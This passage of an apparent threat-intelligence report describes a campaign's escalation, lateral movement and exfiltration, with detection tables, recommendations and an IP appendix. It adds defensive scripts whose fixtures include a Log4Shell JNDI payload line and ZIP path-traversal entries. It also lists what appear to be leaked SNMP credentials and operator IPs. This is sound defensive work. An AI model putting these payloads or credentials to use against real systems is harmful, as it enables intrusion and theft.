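        if t.mode.startswith("gre") and t.destination and not is_trusted(t.destination):
            reasons.append(f"GRE tunnel to non-trusted destination {t.destination}")
        if t.description is None:
            reasons.append("no description: undocumented interface")
        if reasons:
            findings.append({"interface": t.name, "destination": t.destination, "reasons": reasons})
    return findings


# Constructed running-config excerpt: Tunnel0 is a documented internal tunnel,
# Tunnel100 points at an external address (TEST-NET placeholder for an attacker VPS).
SAMPLE_CONFIG = """\
hostname RT-EXAMPLE
!
interface Tunnel0
 description WAN backup to branch office
 ip address 10.255.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 10.200.1.1
!
interface Tunnel100
 ip address 192.168.250.1 255.255.255.252
 tunnel source GigabitEthernet0/1
 tunnel mode gre ip
 tunnel destination 203.0.113.45
!
interface GigabitEthernet0/0
 ip address 10.1.1.1 255.255.255.0
!
"""

if __name__ == "__main__":
    for f in suspicious_tunnels(SAMPLE_CONFIG):
        print(f["interface"], f["destination"], "; ".join(f["reasons"]))
```

Run it against configurations pulled by your normal backup job and diff the findings between runs: a tunnel interface that appears between two backups, with no change ticket and a destination you do not own, is exactly the artefact described in this phase.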

Phase 4 — Privilege Escalation (T1068, T1210, T1078)

PwnKit CVE-2021-4034 is deployed in chunked format for root access on Linux hosts, immediately validated by reading /etc/shadow. Zerologon CVE-2020-1472 is tested against domain controllers to confirm full domain compromise capability. GPP XML artifacts map privileged domain accounts as escalation targets. SAP function modules extract /etc/shadow without requiring OS root, bypassing traditional privilege boundaries. Heap grooming and memory spraying achieve privileged execution on FortiOS.

Phase 5 — Lateral Movement (T1021, T1210, T1090)

Movement proceeds through multiple parallel paths: EternalBlue MS17-010 via SOCKS5 proxy to internal 10.39.x.x subnets with process migration hardening; MS08-067 for legacy Windows nodes; SambaCry for Linux/Unix hosts; PsExec with harvested domain credentials; Impacket portable bundle for wmiexec and ntlmrelayx. A compromised internal host (10.39.1.204) functions as a relay node for multi-hop movement. Neo-reGeorg SMB probing covers 10.8.7.0/24 for Active Directory and file share enumeration.

Phase 6 — Collection and Exfiltration (T1005, T1119, T1048)

Collection targets credentials, PII, cryptographic material, and Active Directory datasets. Oracle tables are batch-extracted in 100,000-row increments via SQL*Plus spooling. PostgreSQL sys_eval pipelines SSL private keys directly to Netcat listeners. A 407MB BloodHound Active Directory dataset is compressed and exfiltrated. ELF binaries are chunked into ~3.9KB fragments for threshold evasion. SOCKS5-tunneled routing through intermediate nodes provides attribution mitigation during egress.

6. Detection Guidance 

The following detection recommendations are derived from specific observed TTPs. Priority should be given to detections covering C2 infrastructure (Neo-reGeorg, Chisel), SAP/Oracle execution abuse, and network device persistence, which represent the highest-impact and most operationally distinctive behaviours.

CloudSEK Detection Guidance Table

Detection Focus | Detection Guidance | ATT&CK Ref
Kimera Reconnaissance | Detect dnsx/naabu/subfinder at high concurrency; monitor for 200+ DNS threads or 5,000 pps port scans from a single source; alert on concurrent multi-tool subdomain enumeration | T1595.001, T1046
Neo-reGeorg Webshell | Detect JSPX/JSP files with custom base64 alphabets; monitor for HTTP POST to .jsp/.jspx with BLV-encoded binary payloads; alert on defineClass reflection in web logs | T1505.003
Chisel Tunnel | Detect TLS fingerprint zvoG6rgGEsFlRDUzCipBinOwuUGYWF9qjiem7stcrEk= in network traffic; alert on TCP-over-HTTP connections to unusual external IPs on port 80/443; monitor binary with SHA-256 0a76c28f... | T1572
EternalBlue / SMBGhost | Alert on SMB exploit signatures; monitor for MS17-010 and CVE-2020-0796 scanner patterns; detect process migration (post/windows/manage/migrate) following SMB sessions | T1210
SAP RFC Abuse | Alert on SXPG_CALL_SYSTEM and SXPG_COMMAND_INSERT RFC calls from non-SAP-admin accounts; monitor SXPGCOSTAB read operations; detect custom OS commands inserted into the SAP command table | T1072
Oracle DBMS_SCHEDULER RCE | Alert on DBMS_SCHEDULER jobs executing OS commands; monitor UTL_FILE reads from /tmp following scheduler activity; detect ld-linux-x86-64.so.2 execution paths | T1569.002
WAF Bypass Attempts | Detect X-Forwarded-For: 127.0.0.1 combined with a Googlebot User-Agent; alert on double URL encoding and null byte injection patterns in web requests | T1205
FortiGate Credential Decryption | Monitor for scripts reading FortiGate ENC entries and using AES-CBC with 16-byte keys; detect fg_decrypt pattern access to config files | T1140
GRE Tunnel on Network Devices | Monitor Cisco IOS-XE for unexpected tunnel interface creation; alert on SSH sessions followed by interface tunnel configuration commands; detect GRE to external IPs | T1572, T1059.008
PwnKit Execution | Detect execution of pkexec with crafted environment variables; monitor for UID change to 0 following pkexec; alert on /etc/shadow access immediately after privilege escalation | T1068
Zerologon Exploitation | Monitor Netlogon authentication attempts with zero-filled credentials against domain controllers; alert on MS-NRPC authentication anomalies | T1210
Kerberoasting | Detect RC4-HMAC Kerberos TGS requests for service accounts; alert on GetUserSPNs.py execution patterns; monitor for large volumes of TGS-REQ | T1558.003
Java Deserialization | Inspect traffic for Java serialization magic bytes AC ED 00 05; alert on CommonsCollections class references in deserialized objects; monitor YSOSERIAL tool signatures | T1203
Log4Shell Activity | Detect JNDI callback strings matching the MGLNDD_<IP>_<PORT> pattern; alert on LDAP connections from Java application servers to external IPs | T1190
ZipSlip Archive | Scan ZIP/WAR archives for entries with ../ path traversal; alert on JSP files extracted outside the intended web root during archive restoration | T1546
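As an added illustration of the web-facing rows in the table above (Neo-reGeorg POSTs to .jsp/.jspx, the Log4Shell MGLNDD_<IP>_<PORT> callback string, the X-Forwarded-For/Googlebot WAF bypass, double URL encoding and null bytes), the following Python script, written for this page and not taken from the report or from CloudSEK tooling, runs those rules over constructed sample access-log lines. The log field layout, rule names and sample addresses are assumptions.

```python
import re

# Constructed sample access-log lines (not from the report); fields are
# client method path status "user-agent" "x-forwarded-for".
SAMPLE_LOG = [
    '203.0.113.7 POST /app/cmd.jspx 200 "Mozilla/5.0" "-"',
    '203.0.113.7 GET /login?u=${jndi:ldap://203.0.113.9:1389/MGLNDD_203.0.113.9_1389} 500 "curl/7.88" "-"',
    '198.51.100.2 GET /admin 200 "Googlebot/2.1" "127.0.0.1"',
    '198.51.100.2 GET /search?q=%252e%252e%252f 200 "Mozilla/5.0" "-"',
    '198.51.100.2 GET /file?name=report.pdf%00.jsp 200 "Mozilla/5.0" "-"',
    '192.0.2.10 GET /index.html 200 "Mozilla/5.0" "-"',
]
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)" "([^"]*)"$')
# Log4Shell callback token named in the detection table: MGLNDD_<IP>_<PORT>
JNDI_RE = re.compile(r"MGLNDD_\d{1,3}(?:\.\d{1,3}){3}_\d{1,5}")
DOUBLE_ENC_RE = re.compile(r"%25[0-9A-Fa-f]{2}")  # %25xx: a second encoding layer
# (rule name, ATT&CK id, predicate over a parsed request)
RULES = [
    ("neo_regeorg_post", "T1505.003",
     lambda e: e["method"] == "POST" and e["resource"].endswith((".jsp", ".jspx"))),
    ("log4shell_callback", "T1190", lambda e: bool(JNDI_RE.search(e["path"]))),
    ("waf_bypass_xff_googlebot", "T1205",
     lambda e: e["xff"] == "127.0.0.1" and "googlebot" in e["ua"].lower()),
    ("double_url_encoding", "T1205", lambda e: bool(DOUBLE_ENC_RE.search(e["path"]))),
    ("null_byte_injection", "T1205", lambda e: "%00" in e["path"]),
]

def parse_line(line):
    """Split one log line into fields; None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = dict(zip(("client", "method", "path", "status", "ua", "xff"), m.groups()))
    entry["resource"] = entry["path"].split("?", 1)[0].lower()  # path minus query
    return entry

def detect(entry):
    """Return (rule, ATT&CK id) pairs that fire for one parsed request."""
    return [(name, tid) for name, tid, pred in RULES if pred(entry)]

def scan_log(lines):
    """Run every rule over every line; one finding per (line, rule) pair."""
    findings = []
    for n, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line; a real pipeline would count these
        for rule, tid in detect(entry):
            findings.append({"line": n, "client": entry["client"], "rule": rule, "attack": tid})
    return findings
```

Running scan_log(SAMPLE_LOG) yields one finding for each of the first five constructed lines and none for the benign sixth.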

7. Diamond Model 

8. Impact

Data theft at scale

  • 1.3M+ customer records extracted via Oracle SQL spooling (dump_batch.sh, 100K-row increments)
  • 407MB BloodHound Active Directory dataset exfiltrated — full trust and privilege map
  • SSL private keys streamed live via PostgreSQL sys_eval piped to Netcat listener
  • SAP service account hashes extracted (WF-BATCH, TMSADM, OSS_RFC — all SAP_ALL profile)
  • Chrome LoginData, DPAPI master key, 11KB Kerberoastable hashes, NTLM captures
  • Historical database backup (2016) recovered — legacy credentials and long-term org intel

Network-layer control

  • Cisco router RT01-IBM-PRINCIPAL-IDE confirmed compromised via TCL script injection
  • GRE tunnel programmatically configured on IOS-XE router pointing to attacker VPS (62.171.185.97)
  • Read-write SNMP community strings extracted (M0n4d0Cn0C#, Cn0C.SnMpR1_iDe)
  • BGP neighbour data exfiltrated — provides capability for traffic redirection
  • MitM potential across network segments with persistent routing-level access

Confirmed RCE 

  • 200.79.113.136 — Wget/1.18 RCE beacon received on port 8888 (callback8888.log)
  • 201.144.122.60 — second independent Wget RCE callback confirmed (rce_callback.log)
  • 135.237.122.202 — Log4Shell JNDI callback string MGLNDD_62.171.185.97_1389 received
  • 201.144.122.58 — interactive shell obtained as postgres user on Ubuntu PostgreSQL 9.5
  • Zerologon validated against domain controller; PwnKit delivering uid=0 on Linux hosts

Long-dwell persistence

  • Chisel server logged 3,708 sessions across a confirmed 13-day window (Jan 28 – Feb 10)
  • Neo-reGeorg webshells deployed across Java, .NET, and PHP stacks in six variants
  • ZipSlip dropper (mkzip34.py) re-establishes webshell on archive restoration — designed to survive incident response
  • AnyDesk configs and N-able LNK files mimic legitimate RMM agents for low-visibility persistence

9. Recommendations

9.1 Perimeter Device Hardening

  • Apply all Fortinet FortiOS security advisories immediately, prioritising CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762; enable SSL inspection on VPN management interfaces
  • Apply all Ivanti Connect Secure patches; implement network segmentation isolating VPN appliances from internal trust zones
  • Disable Cisco IOS TCL scripting on production routers; restrict SSH access to management interfaces via ACL; audit for unexpected tunnel interfaces
  • Disable Apache Tomcat AJP connector or restrict to localhost if not required; apply GhostCat patch (CVE-2020-1938)

9.2 SMB and Legacy Protocol Controls

  • Disable SMBv1 across all Windows infrastructure immediately; apply MS17-010 patches on all legacy systems
  • Apply CVE-2020-0796 (SMBGhost) patches on Windows 10 and Server 2019 nodes
  • Block SMB (445/TCP) at perimeter and between network segments where not operationally required

9.3 Application Layer Security

  • Disable GeoServer WFS if not required; apply all GeoServer security patches and restrict WFS access to authenticated users only
  • Apply Oracle CPU patches; restrict DBMS_SCHEDULER execution privileges; audit UTL_FILE directory access objects
  • Harden SAP RFC interfaces: disable SXPG_CALL_SYSTEM for non-admin users; audit SXPGCOSTAB for unauthorised command entries; implement RFC gateway security
  • Patch all Java application servers against CVE-2021-44228 (Log4Shell) and remove vulnerable commons-collections versions

9.4 Credential and Identity Protection

  • Implement MFA on all VPN, RDP, and administrative interfaces — prevent credential-based lateral movement even when credentials are compromised
  • Rotate all credentials immediately if FortiGate configuration dumps may have been exfiltrated; check for cleartext VPN credentials in config files
  • Implement Kerberos AES encryption; disable RC4-HMAC to prevent Kerberoasting attacks
  • Audit Group Policy Preferences for encrypted passwords (cpassword); remove GPP credential storage

9.5 Network Visibility and Segmentation

  • Deploy network detection for SOCKS5 proxy chains, GRE tunnels to external IPs, and TCP-over-HTTP patterns characteristic of Chisel
  • Monitor for unexpected GRE tunnel interface creation on Cisco IOS/IOS-XE devices
  • Implement TFTP monitoring — the threat actor used TFTP for network device configuration exfiltration on a typically unmonitored protocol
  • Segment SAP and Oracle environments from general enterprise networks; restrict RFC and database port access via firewall policy

9.6 Endpoint and Application Monitoring

  • Deploy file integrity monitoring on web server directories to detect webshell deployment (especially .jsp, .jspx, .aspx, .php additions)
  • Alert on ZIP/WAR archive deployments containing ../ path traversal entries (ZipSlip detection)
  • Monitor for pkexec execution followed by UID change to 0 (PwnKit detection)
  • Audit and restrict AnyDesk and N-able RMM deployments to approved, inventoried instances only
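For the ZipSlip item in 9.6 and the matching row in the detection table, this added Python scanner (not from the report and not related to the mkzip34.py dropper) builds a constructed archive containing a ../ traversal entry and an absolute-path entry, then reports every entry that would land outside the intended restore root. The restore root path and the web-executable extension list are assumptions.

```python
import io
import posixpath
import zipfile

WEB_EXTENSIONS = (".jsp", ".jspx", ".aspx", ".php")

def build_sample_archive():
    """Constructed sample backup (not from the report): two normal entries plus
    one '../' traversal entry and one absolute-path entry, all with inert content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("app/WEB-INF/web.xml", "<web-app/>")
        zf.writestr("app/index.jsp", "<html/>")
        zf.writestr("../../tomcat/webapps/ROOT/x.jspx", "placeholder")
        zf.writestr("/etc/cron.d/job", "placeholder")
    return buf.getvalue()

def is_outside(entry, root="/opt/restore"):
    """True if extracting `entry` under `root` would write outside `root`.
    Backslashes are treated as separators, as a Windows extractor would."""
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, entry.replace("\\", "/")))
    return target != root and not target.startswith(root + "/")

def scan_archive(data, root="/opt/restore"):
    """Return (entry, reason) for every entry that escapes root; a traversal
    entry with a web-executable extension is tagged as a likely webshell drop."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if is_outside(info.filename, root):
                ext = posixpath.splitext(info.filename)[1].lower()
                reason = "traversal+webshell" if ext in WEB_EXTENSIONS else "traversal"
                findings.append((info.filename, reason))
    return findings
```

Note that an absolute entry name escapes the root just as ../ does, so the check normalises the joined path rather than merely searching for the literal string "../".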

10. Appendix

Operator infrastructure:

CloudSEK Threat Actor IP Table

IP Address (Threat Actor) | Usage
62.171.185.97 | Primary operator VPS (reverse shell listener, canary, all payload callbacks)
165.22.184.26 | Secondary relay server (SOCKS5 ports 1080, 5554, 5571)
185.65.245.10:7227 | Possible secondary C2

11. References

Koushik Pal
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.